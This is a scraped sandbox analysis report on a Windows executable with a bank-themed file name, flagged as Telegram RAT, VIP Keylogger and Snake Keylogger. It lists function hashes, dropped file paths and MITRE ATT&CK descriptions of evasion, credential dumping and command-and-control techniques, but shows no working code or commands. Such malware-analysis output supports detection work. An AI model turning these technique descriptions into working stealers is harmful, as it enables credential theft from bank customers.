Function 011AFDB9 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4214704041.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11a0000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30ec256485b740a8ac48121eeb53ee14c09dcc722cac11049af9de491fc7e755
Instruction ID: 3a8d83443456c9bb8fb5fb830fb6bf1db58fc16cef33b5f37981cf3b6670529e
Opcode Fuzzy Hash: 30ec256485b740a8ac48121eeb53ee14c09dcc722cac11049af9de491fc7e755
Instruction Fuzzy Hash: 6F1104B4D0020A9FCB549F68D8057FE7FF2EB48244F004029DA54FB255DB7445428BE1

Function 011AE8E8 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4214704041.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11a0000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe74c2f6fe9fea84e98f9857994ea42fab6859fa2de5f225c02df2b246bf68bf
Instruction ID: a366815e1f22a14ef4512d46f80d7ce734c397396396657c74269bd5389608b3
Opcode Fuzzy Hash: fe74c2f6fe9fea84e98f9857994ea42fab6859fa2de5f225c02df2b246bf68bf
Instruction Fuzzy Hash: 18113578E0420ADFDB41DFA8D9409AEBBB1FB4A300F50816AD910A7354D7345A15CF91

Function 011AABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4214704041.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11a0000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74fd739200dc2863d816030fab272d973ff854aa2ef38ebb137930bb93ba59d5
Instruction ID: ffda2752e0444fd3274f1956dc8e78cf304f7c9ea1c0766604daa8ce05205fa5
Opcode Fuzzy Hash: 74fd739200dc2863d816030fab272d973ff854aa2ef38ebb137930bb93ba59d5
Instruction Fuzzy Hash: A9F09C393006144BA72E5A2EE45462EBEDEEFC8E553954079E609C7379DF61CC07C790

Function 010DD006 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4214278815.00000000010DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10dd000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cbaae661c03c3e45315c06ced76ad148b9b80eccb0f19e9946297b20d9b5bc7
Instruction ID: 9c8401c2b23550d1ab9c5247edf2d56fe72947543cb35852d76f829478c4ad0f
Opcode Fuzzy Hash: 9cbaae661c03c3e45315c06ced76ad148b9b80eccb0f19e9946297b20d9b5bc7
Instruction Fuzzy Hash: 16014F71108780AFD3128F15C894C22BFF9EF8666071984DAE8858B293C235EC41CB61

Function 010DD01F Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4214278815.00000000010DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010DD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10dd000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac9c6044c7c6c117b59865647981d18194488a96d294b4105831ee6177437e7f
Instruction ID: c8caa4290c60d79c8cbdcde80ed837174ea09b0119f3ca9c3d6f9c655027c3d5
Opcode Fuzzy Hash: ac9c6044c7c6c117b59865647981d18194488a96d294b4105831ee6177437e7f
Instruction Fuzzy Hash: 16F0F976600604AF97208F0AD984C27FBEDFBC4670715C59AE94A4B752C671EC42CFA0

Function 011A9C23 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4214704041.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11a0000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 378a8261950f9a3b495b2086e88d98205154f7a713ea441b0415ac2261b715da
Instruction ID: 43915a6c2d035ae02223ef112d36ae1e8bea5c6da6c26549c163dea818765597
Opcode Fuzzy Hash: 378a8261950f9a3b495b2086e88d98205154f7a713ea441b0415ac2261b715da
Instruction Fuzzy Hash: 04F0BB359042589FDB459F6898446EEBFF5EFCA320F05C067E508C7156D3314955CB91

Function 011AFDC8 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4214704041.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11a0000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30e056ffb93608b8edc2930d2eaf9d73c6faecf080dc4239861cb632db442b20
Instruction ID: 1b512175da91485de485496919c16ffdac8ad0f009665d5335f19bf6561ba3e3
Opcode Fuzzy Hash: 30e056ffb93608b8edc2930d2eaf9d73c6faecf080dc4239861cb632db442b20
Instruction Fuzzy Hash: 45F04FB0D0022A9FDB48EF69D8056FEBFF2BB89600F55402AD645EB255DB7449028BE1

Function 011A28A1 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4214704041.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11a0000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b97b18e45e6bef6e6d05c0469c8a005a97a34e6ded2f94fa3a25ddb444122392
Instruction ID: b0da1f7587190eb62a03038e1a4ca88515b8b37b2aee551bd1366d8db4af8801
Opcode Fuzzy Hash: b97b18e45e6bef6e6d05c0469c8a005a97a34e6ded2f94fa3a25ddb444122392
Instruction Fuzzy Hash: 9EE02632D64366CFCB01E7F09C140EEBB74EDD2121B08459BC161371A1FB302259C3A1

Function 011A6739 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4214704041.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11a0000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6c94911d5166f4b679351ed992314b5508dabb2e6cfcdca34393123b0bd6a28
Instruction ID: 56e21b8a03e0ccdc9cce05c3a6a7d66b84d6211115188d3a4193f6adaaf2f064
Opcode Fuzzy Hash: f6c94911d5166f4b679351ed992314b5508dabb2e6cfcdca34393123b0bd6a28
Instruction Fuzzy Hash: 23E086314093C64FD743A7349844498BF36EE83100B5C81F5D0414E6AFCA644C498751

Function 011A28B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4214704041.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11a0000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80cdbb6fd3deca4c3b770428af626df274dd30c42d5bd2bc1999c90c05bf96d2
Instruction ID: f4ad74a97bf9ab54e41a911c88b5c0185c5ebc42f9a76bdc277d2c17e74f6bbf
Opcode Fuzzy Hash: 80cdbb6fd3deca4c3b770428af626df274dd30c42d5bd2bc1999c90c05bf96d2
Instruction Fuzzy Hash: 69D02B31D2022B43CB00E7A1DC004DFF738EEC2220B404223D51037000FB302698C2E0

Function 011A8EF8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4214704041.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11a0000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: 3e7963db4aec10231c208481f48e81ecb51a5ee80a49f41f53ed67bceaf0d89a
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 94C0803710C1242A963D104E7C40DA37F4DC3C13B5A510137FB5CD3200DC425C8001F6

Function 011AD6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4214704041.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11a0000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8889c8094a4ac72eff0c8527882e0c1353c05cf23bc5040012db4fe5e538e81
Instruction ID: db16038fec5b2bf516155643785ee6e37702775e5c32da0d8e5ebeee1ea75f37
Opcode Fuzzy Hash: e8889c8094a4ac72eff0c8527882e0c1353c05cf23bc5040012db4fe5e538e81
Instruction Fuzzy Hash: B5D0E238E00208CBCF30DFA8E4844DCBB71EB48321B20542ADA29A3221C6309450CF41

Function 011AAFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4214704041.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11a0000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f0c0eff5eba7feb9a992161dd2ad1cda09a7585d8ecdd2e50e79231d83d2e60
Instruction ID: fb370a8454e38c1db955b5a9b4bd02e590a1549a367a43fc6b6d2b479829f4a7
Opcode Fuzzy Hash: 8f0c0eff5eba7feb9a992161dd2ad1cda09a7585d8ecdd2e50e79231d83d2e60
Instruction Fuzzy Hash: 6BD0673AB40018DFCB149F99E8408DDF7B6FB98221B148116E915A3265C6319925DB54

Function 011A6748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4214704041.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11a0000_denizbank 25.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ef14d937f09f5ba07167f124f7b91e89d1ed731c81843c7519a4c29507436a6
Instruction ID: 5b67dbe503bef11c02e79b877872b01b6d1ba0625421ec18c847bbfabd1e4bff
Opcode Fuzzy Hash: 6ef14d937f09f5ba07167f124f7b91e89d1ed731c81843c7519a4c29507436a6
Instruction Fuzzy Hash: 5CC0123244130A4FC601FB75ED84959B72BEAC0205B848630A0090A7AEEFB4EC8D4BE0

Non-executed Functions

Function 011A6920 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;kq, xrefs: 011A6936
\;kq, xrefs: 011A695E
\;kq, xrefs: 011A6952
\;kq, xrefs: 011A692C

Memory Dump Source

Source File: 00000005.00000002.4214704041.00000000011A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_11a0000_denizbank 25.jbxd

Similarity

API ID:
String ID: \;kq$\;kq$\;kq$\;kq
API String ID: 0-2874455797
Opcode ID: 528a65a5e6a9b3bc05f93d9e0a0aec19b5bd5136a47e53e395931b3d3ee254f1
Instruction ID: d3c114f03755001787e44cc53259d91b31b01b943395fe0642c2c8be479d9197
Opcode Fuzzy Hash: 528a65a5e6a9b3bc05f93d9e0a0aec19b5bd5136a47e53e395931b3d3ee254f1
Instruction Fuzzy Hash: 0F01DF3A7401058FC72C8E2CC5549A63FE6AF8866076A406AE605CB3B9FB31DC41C741

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report denizbank 25.11.2024 E80 aspc.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\denizbank 25.11.2024 E80 aspc.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5nk0uybc.sli.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fsjdu3er.vuh.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_puj3agw1.25q.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tx2x2e5c.zxc.ps1

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
denizbank 25.11.2024 E80 aspc.exe

Function 00E7D418 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Function 0723BD70 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 0723BD6E Relevance: 1.7, APIs: 1, Instructions: 242
processCOMMON

Function 00E7AD88 Relevance: 1.7, APIs: 1, Instructions: 197
COMMON

Function 00E744B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 00E75917 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Function 0723BAE0 Relevance: 1.6, APIs: 1, Instructions: 74
injectionCOMMON

Function 0723BAE8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 0723B949 Relevance: 1.6, APIs: 1, Instructions: 67
threadCOMMON

Function 0723BBD0 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Function 0723BBD8 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Function 0723B950 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre